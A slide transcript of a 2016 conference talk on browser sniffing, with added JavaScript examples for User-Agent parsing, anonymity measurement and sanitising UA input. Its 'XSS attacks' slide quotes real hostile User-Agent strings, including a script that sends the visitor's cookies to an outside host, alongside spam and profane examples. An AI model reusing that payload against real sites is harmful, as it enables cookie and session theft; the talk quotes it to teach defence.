A presentation at code.talks 2016 in Hamburg, Germany by Niels Leenheer
everybody lies Niels Leenheer 30/09/2016
warning: this talk is full of lies and deception
yes… this talk is about browser sniffing
why?
browser sniffing is dirty
you should use feature detection
Dear Web Developers: Browser Sniffing is Stupid http://www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/
5 Reasons Why Browser Sniffing Stinks https://www.sitepoint.com/why-browser-sniffing-stinks/
Browser Detection is Bad https://css-tricks.com/browser-detection-is-bad/
best practices: responsive design, progressive enhancement, feature detection
anti pattern: browser sniffing
browser sniffing is just a tool
everybody uses browser sniffing
what… is browser sniffing actually?
the http specification defines the user-agent header; it contains a string with information about the browser
every request the browser makes to the server includes the user-agent header
GET http://whichbrowser.net/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: whichbrowser.net

HTTP/1.1 200 OK
Date: Mon, 08 Feb 2016 10:40:28 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
ETag: "984-50cae11796432"
Accept-Ranges: bytes
Content-Length: 2436
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
you can access the exact same string using javascript
you can use the user-agent string to identify: the browser, the rendering engine, the operating system, the device model, and more
what… is browser sniffing good for?
knowledge
if you know the platform or browser, you can streamline the user experience
if you know your users, you can build a better site for them
if you know which browser is being used, you can work around bugs
if you know which browser is causing errors, you can fix them
privacy implications
changing your user agent string actually makes it easier to track you
anonymity by looking like everybody else
brave does not have a useragent string of its own
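The privacy point above (a rare or self-edited User-Agent string makes you easier to track, a common one lets you blend in) can be put in numbers. The following is an added example, not code from the talk: it measures how identifying each User-Agent string in a request log is, as surprisal in bits. The log is constructed for illustration; the four strings are taken from the slides, the proportions are invented, and the function names are this example's own.

```javascript
// Added example, not from the talk: how identifying a User-Agent string is,
// measured as surprisal (bits) over a sample of requests. The "log" below is
// constructed: the strings come from the slides, the proportions are invented.
const UA_COMMON = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180";
const UA_FIREFOX = "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5";
const UA_SAFARI = "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3";
const UA_CUSTOM = "Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko)";

// 1000 constructed requests: three mainstream strings plus one visitor
// who edited their User-Agent string to something unique.
const SAMPLE_LOG = [
  ...Array(600).fill(UA_COMMON),
  ...Array(300).fill(UA_FIREFOX),
  ...Array(99).fill(UA_SAFARI),
  UA_CUSTOM,
];

// Count how often each exact string occurs.
function countByValue(log) {
  const counts = new Map();
  for (const ua of log) counts.set(ua, (counts.get(ua) || 0) + 1);
  return counts;
}

// Anonymity set: how many requests in the log share this exact string.
function anonymitySetSize(log, ua) {
  return countByValue(log).get(ua) || 0;
}

// Surprisal in bits, -log2(p): how much identifying information the string
// carries on its own. A string seen once in N requests carries log2(N) bits.
function surprisalBits(log, ua) {
  const n = anonymitySetSize(log, ua);
  return n === 0 ? Infinity : -Math.log2(n / log.length);
}

// The string to pick if the goal is to look like everybody else.
function leastIdentifying(log) {
  let best = null, bestCount = 0;
  for (const [ua, n] of countByValue(log)) {
    if (n > bestCount) { best = ua; bestCount = n; }
  }
  return best;
}

// Every string in the log, most identifying first.
function report(log) {
  return [...countByValue(log)]
    .map(([ua, n]) => ({ ua, count: n, bits: -Math.log2(n / log.length) }))
    .sort((a, b) => b.bits - a.bits);
}

// Example run over the constructed log.
for (const row of report(SAMPLE_LOG)) {
  console.log(`${row.bits.toFixed(2)} bits  (${row.count}x)  ${row.ua.slice(0, 60)}`);
}
```

In this constructed sample the edited string occurs once in 1000 requests and carries about 10 bits, while the mainstream string carries well under one bit. A rare User-Agent string combined with a handful of other headers is often enough to single out one visitor, which is why "look like everybody else" is the better privacy strategy.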
why… is browser sniffing so difficult?
things started out simple
Mosaic Mosaic/0.9 The name of the browser The version of the browser
Netscape Navigator Mozilla/1.0 (Win3.1) The code name of the browser The version of the browser Operating system
but it quickly started to get complicated
Internet Explorer Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) The name of the browser Compatible with Netscape Navigator 1.0 The version of the browser Operating system
Opera Opera/8.54 (Windows 95; U; en) The name of the browser The version of the browser Operating system English language United States level encryption
Opera Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 Rendering engine
Opera Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.0 Version/10.00 The name of the browser Fake version of the browser Real version of the browser
Firefox Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5 The name of the rendering engine Build date of the rendering engine The name of the browser Version of the browser Version of the rendering engine
Firefox Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Build date is no longer updated
Firefox Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
and it gets worse…
Safari Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 The name of the browser Version of the browser
Chrome Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 The name of the browser Version of the browser
Opera Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 The name of the browser Version of the browser
Internet Explorer Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of the browser
Edge Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 The name of the browser Version of the browser
and those were all relatively normal user-agent strings
“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings
sometimes browsers simply do not make sense at all
Samsung Internet Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36 Samsung device Version of the browser
Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5
LG Netcast Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+
sometimes browsers lie to hide their true identity
Opera Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser The name of the operating system Version of the browser
Opera Mobile (desktop mode) Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser ROT 13 encrypted “mobi“ Version of the browser
Internet Explorer Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Browser version
Internet Explorer (compatibility view) Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Trident 5 means it’s Internet Explorer 9
browsers can change the user-agent strings for individual websites
Mobile Internet Explorer 11 on Windows Phone 8.1 on html5test.com Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; ARM; Touch; WPDesktop; Lumia 535)
Mobile Internet Explorer 11 on Windows Phone 8.1 Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 535) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537
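The strings above show why identification is an exercise in precedence rules rather than pattern matching: Edge carries Chrome and Safari tokens, Blink-based Opera carries a Chrome token, Presto-based Opera hides its real version behind Version/, compatibility-view Internet Explorer reports an older MSIE but a newer Trident, and Opera Mobile in desktop mode ROT13-encodes "mobi". The following is an added example, not code from the talk and not from UAParser, PiwikDeviceDetector or WhichBrowser: a tokenizer for the product/comment grammar of RFC 7231 plus an identifier that applies those precedence rules to the strings on the slides. The Trident-to-IE table extends the Trident/5.0 = IE 9 fact on the slide with the other released Trident versions; the engine names for Edge and Blink-era Chrome are this example's own additions.

```javascript
// Added example, not code from the talk or any of the libraries it names:
// a User-Agent tokenizer (RFC 7231 product/comment grammar) and an
// identifier that applies the precedence rules the slides illustrate.

// Split a UA string into {product, version} tokens and parenthesised
// {comment: [...]} tokens; comment contents are split on ';'.
function tokenize(ua) {
  const tokens = [];
  let i = 0;
  while (i < ua.length) {
    if (ua[i] === " ") { i++; continue; }
    if (ua[i] === "(") {
      // comments may nest, e.g. "(PSP (PlayStation Portable); 2.60)"
      let depth = 0, j = i;
      for (; j < ua.length; j++) {
        if (ua[j] === "(") depth++;
        else if (ua[j] === ")" && --depth === 0) break;
      }
      const inner = ua.slice(i + 1, j); // j is the closing ')' or end of string
      tokens.push({ comment: inner.split(";").map(s => s.trim()).filter(Boolean) });
      i = j + 1;
      continue;
    }
    let end = i;
    while (end < ua.length && ua[end] !== " " && ua[end] !== "(") end++;
    const word = ua.slice(i, end);
    const slash = word.indexOf("/");
    tokens.push(slash >= 0
      ? { product: word.slice(0, slash), version: word.slice(slash + 1) }
      : { product: word, version: null });
    i = end;
  }
  return tokens;
}

// Trident (engine) version -> real Internet Explorer version. The slide shows
// compatibility view claiming MSIE 8.0 with Trident/5.0, which is IE 9.
const TRIDENT_TO_IE = { "4.0": "8.0", "5.0": "9.0", "6.0": "10.0", "7.0": "11.0" };

// ROT13; Opera Mobile's desktop mode hides "mobi" as "zbov".
const rot13 = s => s.replace(/[a-z]/gi, c => {
  const base = c <= "Z" ? 65 : 97;
  return String.fromCharCode((c.charCodeAt(0) - base + 13) % 26 + base);
});

function identify(ua) {
  const products = new Map();
  const comments = [];
  for (const t of tokenize(ua)) {
    if (t.comment) comments.push(...t.comment);
    else products.set(t.product, t.version);
  }
  const fromComment = re => {
    for (const c of comments) { const m = re.exec(c); if (m) return m[1]; }
    return null;
  };
  const trident = fromComment(/^Trident\/([\d.]+)$/);
  const msie = fromComment(/^MSIE ([\d.]+)$/);
  const rv = fromComment(/^rv:([\d.]+)$/);
  const r = { browser: null, version: null, engine: null, notes: [] };

  if (trident) r.engine = "Trident";
  else if (products.has("Presto")) r.engine = "Presto";
  else if (products.has("AppleWebKit")) r.engine = "WebKit";
  else if (products.has("Gecko")) r.engine = "Gecko";

  if (products.has("Edge")) {            // Edge also claims Chrome and Safari
    r.browser = "Edge"; r.version = products.get("Edge"); r.engine = "EdgeHTML";
  } else if (products.has("OPR")) {      // Blink-based Opera also claims Chrome
    r.browser = "Opera"; r.version = products.get("OPR"); r.engine = "Blink";
  } else if (products.has("Opera")) {    // Presto Opera: Version/ is the real version
    r.browser = "Opera"; r.version = products.get("Version") || products.get("Opera");
    if (comments.some(c => rot13(c).includes("mobi")))
      r.notes.push("Opera Mobile in desktop mode ('zbov' is ROT13 for 'mobi')");
  } else if (trident || msie) {          // Trident wins over the WebKit tokens IE Mobile adds
    r.browser = "Internet Explorer";
    r.version = (trident && TRIDENT_TO_IE[trident]) || msie || rv;
    if (msie && msie !== r.version)
      r.notes.push(`compatibility view: claims MSIE ${msie}, Trident/${trident} means IE ${r.version}`);
  } else if (products.has("Firefox")) {
    r.browser = "Firefox"; r.version = products.get("Firefox");
  } else if (products.has("Chrome")) {   // Samsung Internet puts its own version in Version/
    const samsung = products.has("Version") && comments.some(c => c.startsWith("SAMSUNG"));
    r.browser = samsung ? "Samsung Internet" : "Chrome";
    r.version = samsung ? products.get("Version") : products.get("Chrome");
    if (parseInt(products.get("Chrome"), 10) >= 28) r.engine = "Blink";
  } else if (products.has("Safari")) {
    r.browser = "Safari"; r.version = products.get("Version") || products.get("Safari");
  } else if (products.has("NetFront")) {
    r.browser = "NetFront"; r.version = products.get("NetFront");
  }
  return r;
}

// Strings taken from the slides.
const SAMPLES = {
  edge: "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162",
  ieCompat: "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
  ie11: "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko",
  operaMobi: "Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50",
  samsung: "Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36",
  psp: "Mozilla/4.0 (PSP (PlayStation Portable); 2.60)",
};
for (const [name, ua] of Object.entries(SAMPLES)) console.log(name, identify(ua));
```

The order of the branches is the whole point: move the Chrome check above Edge or OPR and both browsers become "Chrome", move the WebKit engine check above Trident and IE Mobile becomes a WebKit browser. Every new browser that copies an older string forces another rule, which is why the talk recommends a maintained library over a home-grown one.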
sometimes browsers are just weird
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Vehicle Center Console Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) NetFront/3.1 MMP/2.0
Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1
Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)
Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1
Mozilla/4.0 (PSP (PlayStation Portable); 2.60)
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2
? Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] Opera Bork-edition?
BORK BORK BORK
and it is possible to change the user-agent string yourself
spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)
XSS attacks
<script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony”>XSS attacks
funny people (╯°□°)╯︵ ┻━┻ Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko)
angry people
angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.
1.000.000 unique useragent strings: 108 x sex, 82 x fuck, 10 x shit, 9 x dick, 6 x ass, 4 x balls, 3 x vagina
user-agent strings cannot be trusted!
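The spam and XSS slides make the practical point: the User-Agent header is attacker-controlled input, and the script payloads shown fire not in the attacker's browser but in whatever page later renders the string unescaped (a log viewer, an analytics dashboard, an admin page), where the `document.cookie` exfiltration would run with the viewer's session. The following is an added example, not code from the talk: a header-grammar check, a log normaliser and output escaping for a hypothetical log viewer. The sample strings are constructed after the ones on the slide, and the function names are this example's own.

```javascript
// Added example, not from the talk: treat the User-Agent header as untrusted
// input. Validity and safety are separate questions: a string can be a
// perfectly legal header value and still be an XSS payload, so escaping
// must happen at the output boundary regardless of validation.

// RFC 7231 field-value: visible ASCII, space, tab and obs-text. CR, LF and
// other control characters are rejected; they enable log and header injection.
function isValidHeaderValue(value, maxLength = 4096) {
  return typeof value === "string"
    && value.length <= maxLength
    && !/[\x00-\x08\x0a-\x1f\x7f]/.test(value);
}

// Escape for insertion into HTML text or attribute content.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Normalise a UA string before writing it to a log line: replace control
// characters and cap the length, so one request cannot forge extra log
// entries or bloat the log file.
const LOG_MAX = 512;
function sanitizeForLog(ua) {
  let s = String(ua).replace(/[\x00-\x1f\x7f]/g, "?");
  if (s.length > LOG_MAX) s = s.slice(0, LOG_MAX) + "...[truncated]";
  return s;
}

// One row of a hypothetical admin log viewer. Escaping at the output
// boundary means whatever the header contained is displayed as text.
function renderLogRow(entry) {
  return `<tr><td>${escapeHtml(entry.ip)}</td><td>${escapeHtml(entry.ua)}</td></tr>`;
}

// Constructed samples modelled on the slide (straight quotes, no real host).
const XSS_UA = '<script>alert("My Little Pony");</script>';
const NORMAL_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)";
const CRLF_UA = "Mozilla/5.0\r\nforged log line";

for (const ua of [NORMAL_UA, XSS_UA, CRLF_UA]) {
  console.log(isValidHeaderValue(ua) ? "valid header " : "REJECT       ",
              sanitizeForLog(ua), "=>", renderLogRow({ ip: "203.0.113.7", ua }));
}
```

Note that `isValidHeaderValue(XSS_UA)` is true: the payload is a legal header value, which is exactly why validation alone does not protect the page that displays it. Detection-wise, a User-Agent containing `<script`, `document.cookie` or CR/LF is a cheap, high-signal rule for a WAF or log pipeline, but the fix is the escaping, not the rule.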
everybody lies
you should never use browser sniffing for controlling access to your website
you should never use browser sniffing for determining browser capabilities
you should never build your own browser sniffing library
#1 use a browser sniffing library that is regularly updated
#2 check if it is possible to automatically schedule updates
try libraries like UAParser, PiwikDeviceDetector or WhichBrowser https://github.com/ua-parser https://github.com/piwik/device-detector https://github.com/whichbrowser
http://useragent.mkf.solutions https://github.com/ThaDafinser/UserAgentParserComparison
“If you tell a big enough lie and tell it frequently enough, it will be believed” — Gandhi
“If you tell a big enough lie and tell it frequently enough, it will be believed” — Adolf Hitler
thank you!
This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on GitHub still shows millions of lines of code referring to user agent strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.